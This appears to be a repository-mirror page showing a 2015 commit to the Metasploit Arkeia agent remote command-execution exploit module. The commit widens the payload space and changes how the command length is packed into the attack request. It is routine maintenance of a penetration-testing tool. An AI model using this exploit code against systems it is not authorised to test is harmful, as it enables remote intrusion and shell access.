infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix length limitation

bug/bundler_fix
jvazquez-r7 2015-07-10 16:24:49 -05:00
parent 29a497a616
commit 95ae7d8cae
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 4 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
modules/exploits/multi/misc/arkeia_agent_exec.rb
View File

@ -53,7 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'unix', 'Platform' => 'unix',
'Payload' => 'Payload' =>
{ {
'Space' => 255, 'DisableNops' => true,
'Space' => 60000,
'Compat' => { 'Compat' => {
'PayloadType' => 'cmd cmd_bash', 'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'perl python bash-tcp gawk openssl' 'RequiredCmd' => 'perl python bash-tcp gawk openssl'
@ -465,8 +466,8 @@ class Metasploit3 < Msf::Exploit::Remote
command_length = '%02x' % command.length command_length = '%02x' % command.length
command_length = command_length.scan(/../).map { |x| x.hex.chr }.join command_length = command_length.scan(/../).map { |x| x.hex.chr }.join
req = "\x00\x64\x00\x04\x00\x04\x00" req = "\x00\x64\x00\x04\x00\x04"
req << command_length # Maximum length can be 255 bytes (0xFF) req << [command.length].pack('n')
req << command # Our command to be executed req << command # Our command to be executed
req << "\x00" req << "\x00"